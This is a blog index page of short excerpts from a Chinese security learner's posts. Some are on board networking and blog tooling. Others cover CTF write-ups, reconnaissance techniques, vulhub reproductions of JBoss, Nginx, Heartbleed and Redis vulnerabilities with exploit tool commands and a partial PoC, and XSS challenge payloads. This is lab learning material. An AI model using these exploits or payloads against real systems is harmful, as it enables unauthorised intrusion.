Arm开发板联网配置

文章背景 使用S5P6818开发板时,有业务上云的需求,遂有本文,内容较少,仅涉及联网部分。 问题描述 插上网线后无法获取IP 配置静态IP后无法ping通外网 解决方案 分两步解决。 1.配置静态IP 方法一 命令行配置: ifconfig eth0 <ip> netmask <netmask> 方法二 写配置文件: vi /etc/init.d/rcS # 网卡开机自启 ifconfig eth0 up ifconfig eth0 <ip> netmask <netmask> 2.配置网关及DNS服务器 完成第一步后,可以ping通局域网下的主机,但无法ping通外网,出现如下报错: sendto: Network is unreachable 使用route命令查看路由表: Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface <ip> * 255.255.255.0 U 0 0 0 eth0 发现没有网关,配置网关: route add default gw <ip> 再使用route命令验证一下,确认配好。 之后便要配置DNS解析,在/etc目录下新建一个resolv.conf配置文件,内容如下: #114 DNS服务器 nameserver 114.114.114.114 #微软 DNS服务器 nameserver 233....

Created: 2021-07-20 · Updated: 2021-07-20 · 0opsdc

utterances博客评论插件

概述 utterances是一个基于GitHub issue,拥有多种主题的开源小组件,本文将简述使用如何在hugo博客部署utterances。 配置过程 新建仓库 新建一个公开的仓库,用于存放评论,名字随意。作者在此处创建一个名为utterances的公开仓库。 安装utterances GitHub Apps - utterances 点击安装即可,选择仓库: 安装完成后会自动跳转到官方页面。 在文件中添加插件 官方文档:utterances 修改footer.html文件,以PaperMod主题为例: <footer class="footer"> {{- if .Site.Copyright }} <span>{{ .Site.Copyright | markdownify }}</span> {{- else }} <span>&copy; {{ now.Year }} <a href="{{ "" | absLangURL }}">{{ .Site.Title }}</a></span> {{- end }} <span>&middot;</span> <span>Powered by <a href="https://gohugo.io/" rel="noopener noreferrer" target="_blank">Hugo</a></span> <span>&middot;</span> <span>Theme <a href="https://git.io/hugopapermod" rel="noopener" target="_blank">PaperMod</a></span> <script src="https://utteranc.es/client.js" repo="oopsdc/utterances" issue-term="title" theme="github-light" crossorigin="anonymous" async> </script> </footer> 运行命令hugo server进入一篇文章即可查看评论插件效果。...

Created: 2021-07-20 · Updated: 2021-07-20 · 0opsdc

ProxyChains简单使用

概述 ProxyChains是一个Linux和Unix下的代理工具,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4、SOCKS5类型的代理服务器,且可配置多个代理。 ProxyChains通过用户自定义的代理列表强制连接指定的应用程序。 本文简述kali下如何通过ProxyChains使用Windows主机代理。 相关资料 GitHub项目地址 ProxyChains:haad/proxychains: proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: “user/pass” for SOCKS4/5, “basic” for HTTP. (github.com) ProxyChains-ng:rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project....

Created: 2021-07-09 · Updated: 2021-07-09 · 0opsdc

从0到1-CTFer成长之路

平台地址:N1BOOK平台-Nu1L Team 第一章 Web入门 信息搜集 常见搜集 Des:一共3部分flag。 环境搭建 docker-compose.yml: version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-backk:latest ports: - 80:80 启动: docker-compose up -d 解题过程 既然说到了敏感文件,先试试robots.txt文件是否存在: User-agent: * Disallow: /flag1_is_her3_fun.txt 访问flag1_is_her3_fun.txt,获得第一部分flag。 剩下的工作就是扫描后台了,分别访问index.php~和.index.php.swp。 粗心的小李 Des:看看能不能找到信息吧? 环境搭建 docker-compose.yml: version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-git:latest ports: - 80:80 启动: docker-compose up -d 解题过程 Git泄露,找一下利用工具:gakki429/Git_Extract: 提取远程 git 泄露或本地 git 的工具 (github.com) 使用后会在当前目录生成一个以网站命名的文件夹,cd进去,发现有一个index.html文件。flag就在其中。 SQL注入 SQL注入-1 Des:N/A。 环境搭建 docker-compose.yml: version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 启动:...

Created: 2021-07-03 · Updated: 2021-07-03 · 0opsdc

自定义GitHub个人资料

概述 想自定义一下GitHub的个人资料自述文件,遂有本文。 官方文档:管理个人资料自述文件 - GitHub Docs 关于自述文件:关于自述文件 - GitHub Docs 基本要求 创建一个与用户名相同的公开仓库 仓库根目录包含README.md文件 README.md文件不能为空 实现步骤 1.添加个人资料自述文件 1.新建仓库 在任意页面点击右上角的+号创建一个与自己用户名相同的仓库。当输入自己的用户名时,会出现一个小彩蛋。 2.添加仓库说明(可选) 3.设置仓库为公共属性 4.使用自述文件初始化仓库 5.创建仓库并编辑README文档 生成的自述文件已由模板预先填充,也可自定义表情、符号。 表情符号清单:🎁 Emoji cheat sheet for GitHub, Basecamp, Slack & more (webfx.com) 在想要换行的文本前后加上<br>和</br>即可,如: <br>This is test</br> 2.删除个人资料自述文件 以下任一满足,个人资料自述文件就将会被删除: 自述文件为空或不存在 仓库为私有仓库 仓库名与用户名不匹配 文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。

Created: 2021-07-01 · Updated: 2021-07-01 · 0opsdc

信息搜集

信息收集概念 进行渗透测试之前,最重要的一步就是信息收集。 信息收集的主要内容:收集服务器配置信息、网站敏感信息等,包括域名、子域名信息、目标网站系统CMS指纹、目标网站真实IP、开放端口等。 1、收集域名信息 知道目标域名后,第一件事就是获取域名注册信息,包括域名DNS服务器信息及注册人联系信息等。 Whois命令查询 概念:Whois是一个标准互联网协议,可用于收集网络注册信息,如注册域名、IP等。 原理:Whois就是一个用于查询域名是否被注册及注册域名详细信息的数据库。 作用:获得注册人姓名和邮箱,通过社工进一步获取其它信息。 用法: whois baidu.com 在线Whois查询网站: 站长工具_whois查询工具_爱站网 (aizhan.com) 域名Whois查询 - 站长之家 (chinaz.com) VirusTotal 2、查询备案信息 概念:网站备案是工具国家法律法规规定,需要网站所有者向国家有关部门申请的备案。这是国家信息产业部对网站的一种管理。 注意:若网站搭建在其他国家,则不需进行备案。 在线备案信息查询网站: 天眼查-商业查询平台_企业信息查询_公司查询_工商查询_企业信用信息系统 (tianyancha.com) 3、收集敏感信息 搜索关键字 通过搜索引擎构造特殊关键字语法来搜索互联网上的相关敏感信息。还可用其来收集数据库文件、SQL注入、配置信息、源码泄露、未授权访问和robots.txt等敏感信息。 常用搜索语法(各搜索引擎大同小异): 语法 作用 Site 指定域名 Inurl URL存在关键字的网页 Intext 网页正文中的关键字 Filetype 指定文件类型 Intitle 网页标题中的关键字 link link:baidu.com 表示返回所有和baidu.com做了链接的URL Info 查找指定站点的基本信息 cache 搜索Google中关于某些内容的缓存 一般可以把语法结合使用以获得更准确的信息。 使用Burp Suite的Repeater模块 将抓到的包发送至Repeater模块,查看服务器端的响应包。可以获得一些服务器信息,如Server类型及版本、PHP版本信息等。 GitHub信息泄露 可以尝试在GitHub上搜寻敏感信息,如数据库连接信息、uc-key、阿里osskey、邮箱帐密等。 4、收集子域名 子域名,即二级域名,指顶级域名之下的域名。假设目标网站规模较大,一般来说从主站入手都是极不理智的选择,这时我们就可以考虑从子域迂回接近目标。 子域名检测工具 Layer子域名挖掘机:较为常用,有域名、解析IP、CDN列表、Web服务器和网站状态。 subDomainBrute:用小字典递归发现三级、四级甚至是五级域名。 Sublist3r:能列举多种资源,如在Google、Yahoo、Bing、Baidu和Ask等搜索引擎中可查到的子域名,还可列出Netcraft、VirusTota、ThreatCrow、DNSdumpster和Reverse DNS查到的子域名。 利用搜索引擎语法 利用site语法搜索与某域名相关的网页信息。 证书透明度公开日志枚举 证书透明度(Certificate Transparency, CT):是证书授权机构(CA)的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。 SSL/TLS证书通常包含域名、子域名和邮件信息,这些也经常成为攻击者想获得的信息。 在线网站:...

Created: 2021-06-25 · Updated: 2021-06-25 · 0opsdc

JBoss漏洞复现

JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504 漏洞描述 Red Hat JBoss Application Server是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JBossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 影响版本 JBoss AS 4.x及之前。 复现思路 漏洞复现 环境搭建: git clone https://github.com/vulhub/vulhub.git cd vulhub/jboss/CVE-2017-7504 docker-compose up -d Jexboss工具:joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (github.com) git clone https://github.com/joaomatosf/jexboss.git python3 jexboss.py -host http://<ip>:8080 成功利用漏洞执行命令。 文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。

Created: 2021-06-17 · Updated: 2021-06-17 · 0opsdc

Nginx漏洞复现

Nginx 越界读取缓存漏洞 CVE-2017-7529 漏洞描述 Nginx在反向代理站点的时候,通常会缓存一些文件,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括文件头+HTTP返回包头+HTTP返回包体。如果二次请求命中该缓存文件,Nginx会直接将该文件中的HTTP返回包体返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能读取到缓存文件中位于HTTP返回包体前的文件头、HTTP返回包头等内容。 影响版本 Nginx 0.5.6 ~ 1.13.2 复现思路 漏洞复现 环境搭建: git clone https://github.com/vulhub/vulhub.git cd vulhub/nginx/CVE-2017-7529 docker-compose up -d 访问:http://<ip>:8080正常即可。 POC已经在当前目录中给出来,文件名poc.py: #!/usr/bin/env python import sys import requests if len(sys.argv) < 2: print("%s url" % (sys.argv[0])) print("eg: python %s http://your-ip:8080/" % (sys.argv[0])) sys.exit() headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" } offset = 605 url = sys.argv[1] file_len = len(requests....

Created: 2021-06-17 · Updated: 2021-06-17 · 0opsdc

服务器应用漏洞

OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日,OpenSSL发布安全公告,在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞,漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。 影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。 复现思路 漏洞复现 环境搭建: git clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击: msfconsole set RHOST <ip> set verbose true run Redis Redis 主从复制RCE 漏洞描述 在2019年7月7日结束的WCTF2019 Final上,LC/BC成员Pavel Toporkov在分享会上介绍了一种关于Redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大。 Pavel Toporkov的分享: 15-redis-post-exploitation.pdf (zeronights.ru) 影响版本 Redis <= 5.0.5 复现思路 漏洞复现 环境搭建: docker pull a1143535418/redis5.0 docker run -p 6379:6379 -d a1143535418/redis5.0 redis-server 利用脚本: n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE (github.com)...

Created: 2021-06-17 · Updated: 2021-06-17 · 0opsdc

XSS Challenges

题目地址:https://xss-quiz.int21h.jp/ Stage #1 Hint: Very simple… 直接输入测试语句: <sCript>alert(document.domain);</Script> Stage #2 Hint: Close the current tag and add SCRIPT tag… 地址:XSS Challenges (by yamagata21) - Stage #2 (int21h.jp) 上测试语句: <sCript>alert(document.domain);</Script> 然后审查元素,只需要把input标签闭合就能执行我们的语句了。 "><sCript>alert(document.domain);</Script> Stage #3 Hint: The input in text box is properly escaped. 地址:XSS Challenges (by yamagata21) - Stage #3 (int21h.jp) 这个页面有两个input标签,先在搜索框输入我们的测试语句试试。 直接把我们的语句放到<b>标签里了,但是这旁边不是还有一个input标签吗。把两者的name互换一下即可。 Stage #4 Hint: Invisible input field. 地址:XSS Challenges (by yamagata21) - Stage #4 (int21h.jp) 审查元素发现有三个input标签,第三个标签的属性是hidden,把它改为text,然后把input标签闭合。 "><sCript>alert(document.domain);</Script> Stage #5 Hint: Length limited text box....

Created: 2021-06-10 · Updated: 2021-06-10 · 0opsdc